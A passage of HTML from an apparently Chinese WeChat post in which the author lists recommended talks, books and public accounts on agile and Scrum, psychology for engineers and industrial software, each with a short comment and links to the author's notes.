left;"><strong><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">关注</span></strong></p></td><td width="455" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><strong><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">体验、火花、感想</span></strong></p></td></tr><tr><td width="91" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">许知远，十三邀</span></p></td><td width="459" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">笔记本接上大电视，坐沙发时基本上就看这个系列，有的可以看两遍，记点笔记，人真的多姿多彩。按点击率，看了罗翔、费翔、王宝强、姜文、陈晓卿、韩红、郝蕾、胡润、于谦、李景亮、李诞、金宇澄、五条人、张艺谋、蔡皋、陈传兴、彭凯平、徐皓峰。</span></p></td></tr><tr><td width="89" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">经济50人，江小涓</span></p></td><td width="455" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">数字时代，传统体系不太适用，经济学和公共管理学科体系需要新的建设</span></p></td></tr><tr><td width="89" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">蔡崇信</span></p></td><td width="455" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">你必须能够告诉别人，你在某件事情上是专家，这就是你获得尊重的方式。</span></p></td></tr><tr><td width="89" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">刘润</span></p></td><td width="455" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">所有的合作，都要有专业的价值：如何成为一个大乙方？</span></p></td></tr><tr><td width="91" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">张朝阳，彭凯平</span></p></td><td width="454" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">人不是被过去决定，人是被未来召唤。</span></p></td></tr><tr><td width="91" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">葛剑雄，何以中国</span></p></td><td width="454" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">中华文明探源工程，有考古、现代科技鉴定，比商周断代工程，更能让人接受</span></p></td></tr><tr><td width="89" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">季东来，编、导、演</span></p></td><td width="455" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">做喜欢的事情，全心全意去做好，做得极致。</span></p></td></tr><tr><td width="91" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">王德峰，马克思哲学革命及成果</span></p></td><td width="454" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">很犀利的解读。如资本是社会权力，权力决定权利；自然科学越发展越…</span></p></td></tr><tr><td width="89" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">儒释道</span></p></td><td width="455" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">三摩地、道德经、小窗幽记、围炉夜话。若想梦寐怡，睡前可以翻翻。</span>        <o:page></o:page></p></td></tr><tr><td width="89" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">推荐的公众号</span></p></td><td width="455" valign="top" style="padding: 2pt 3pt;border-width: 1pt;border-color: rgb(163, 163, 163);"><p style="margin-left: 0pt;text-indent: 0pt;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><span style="font-size: 11pt;font-family: 微软雅黑;font-variant-numeric: normal;font-variant-east-asian: normal;font-variant-alternates: normal;font-variant-position: normal;">CodeWisdom、君哥的体历、Techness Thinking、破马张飞话敏捷、计算机学会、社会学研究杂志、彭凯平、ScrumInc、晓谈岩说、孙要良教授讲哲学，勿空与无师、经济50人</span></p></td></tr></tbody></table><p style="margin-left: 0pt;letter-spacing: 0.578px;text-indent: 0pt;text-wrap: wrap;line-height: normal;font-size: 12pt;font-family: 宋体;text-align: left;"><br/></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">一、敏捷：先进、愉快的生产协作方式是什么？</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="158" valign="top" style="width: 126.3pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><strong><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">作者、机构</span></strong></p></td><td width="394" valign="top" style="width:314.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><strong><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">简评</span></strong></p></td></tr><tr><td width="158" valign="top" style="width:127.65pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">群主：王蕾 Lisa，</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">主角：Jeff Sutherland</span></p></td><td width="394" valign="top" style="width: 318pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">《SCRUM的第一性原理》</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">要有点深度才称得上理工男，要持续学习输出才能成为祖师爷。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">参加读书会，新认识很多人。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">笔记：<a target="_blank" href="http://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483716&amp;idx=1&amp;sn=7bbc7a326caad21285ac8397bad65dd5&amp;chksm=cf3d7361f84afa77ecb036d22c2800239de48a945006c414fe395b238e6c2741e33d05467e71&amp;scene=21#wechat_redirect" textvalue="企业敏捷转型（20220609对话Jeff Sutherland笔记）" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">企业敏捷转型（20220609对话Jeff Sutherland笔记）</a>,<a target="_blank" href="http://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483716&amp;idx=1&amp;sn=7bbc7a326caad21285ac8397bad65dd5&amp;chksm=cf3d7361f84afa77ecb036d22c2800239de48a945006c414fe395b238e6c2741e33d05467e71&amp;scene=21#wechat_redirect" textvalue="企业敏捷转型（20220609对话Jeff Sutherland笔记）" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">企业敏捷转型（20220609对话Jeff Sutherland笔记）</a>,<a target="_blank" href="http://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483824&amp;idx=1&amp;sn=92bc66aaeb5e5206ab85635f9cbcbeab&amp;chksm=cf3d7395f84afa8395b4bf5464e14f567e4fcd8d30989962e0cab5c33882945254cd7556c05e&amp;scene=21#wechat_redirect" textvalue="《SCRUM第一性原理》读书会（1）" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">《SCRUM第一性原理》读书会（1）</a></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-family: 微软雅黑;font-size: 14.6667px;letter-spacing: 0.578px;text-align: left;text-wrap: wrap;">今年Lisa邀请Jeff又给中国信众讲了一次，笔记作业还没完成。</span></p></td></tr><tr><td width="158" valign="top" style="width:126.3pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">Henrik Kniberg</span></p></td><td width="394" valign="top" style="width:314.4pt;border-top:solid #A3A3A3 1.0pt;border-left:solid #A3A3A3 1.0pt;border-bottom:solid #A3A3A3 1.0pt;border-right:solid #A3A3A3 1.0pt;padding:2.0pt 3.0pt 2.0pt 3.0pt;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">Spotify Engineering Culture。Spotify也是小型的社会实验</span>        <o:page></o:page></p></td></tr></tbody></table><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"> </span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">二、心理学：近年和敏捷结合最紧密的学科</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="104" valign="top" style="width: 97.85pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">码上幸福社区</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">群主：李静</span></p></td><td width="449" valign="top" style="width: 429.7pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">研发幸福课。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">笔记：<a target="_blank" href="http://mp.weixin.qq.com/s?__biz=Mzg3NTc4NDAxMA==&amp;mid=2247483768&amp;idx=1&amp;sn=0d009dd6c81320d1f80cc80969e16dfa&amp;chksm=cf3d735df84afa4bff4ec33f849875d11774cee331e647f3e441cfac17a5a93acf4aa5f9f74c&amp;scene=21#wechat_redirect" textvalue="研发工程师幸福公开课笔记" linktype="text" imgurl="" imgdata="null" data-itemshowtype="0" tab="innerlink" data-linktype="2">研发工程师幸福公开课笔记</a></span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">后续邹英毅老师Michelle还从心理学多个理论框架分析了我发表过的论文和案例，带我入门心理学，感恩。</span></p></td></tr><tr><td width="104" valign="top" style="width: 99.3pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">吴亮，前大厂管人的</span></p></td><td width="449" valign="top" style="width: 423.3pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">《视己为人》，京东霸榜。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">谈社会情绪向下背景下的码农幸福和选择，内容非常直接。</span></p></td></tr></tbody></table><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-fareast-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;"> </span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;mso-outline-level: 1;"><span style="font-size:16.0pt;mso-bidi-font-size:16.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:Calibri;font-variant:normal;text-transform:none;color:#14324D;mso-font-kerning:18.0pt;font-weight:bold;mso-bidi-font-weight:bold;">三、工业软件：软件学科的本源在哪里？</span></p><table border="1" cellspacing="0" cellpadding="0" style="margin-left: 0px;border-width: initial;border-style: none;border-color: initial;border-collapse: collapse;width: 100%;"><tbody><tr><td width="110" valign="top" style="width: 83.8pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">陆云强</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">也是群主</span></p></td><td width="442" valign="top" style="width: 337.7pt;border-width: 1pt;border-style: solid;border-color: rgb(163, 163, 163);padding: 2pt 3pt;word-break: break-all;"><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: auto;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: 宋体;mso-fareast-font-family: &#39;宋体&#39;;mso-bidi-font-family: 宋体;font-weight: normal;mso-bidi-font-weight: normal;text-align: left;mso-pagination: widow-orphan;"><span style="font-size:11.0pt;font-family:微软雅黑;mso-ascii-font-family:微软雅黑;mso-bidi-font-family:宋体;font-variant:normal;text-transform:none;mso-font-kerning:0.0pt;">《工业软件发展报告》，每年都发，陆先生的</span><span style="font-family: 微软雅黑;font-size: 11pt;text-indent: 0pt;letter-spacing: 0.034em;">每个构图都是多个视角的聚合，背后的思想内敛而深邃。</span></p><p style="mso-margin-top-alt: auto;mso-margin-bottom-alt: 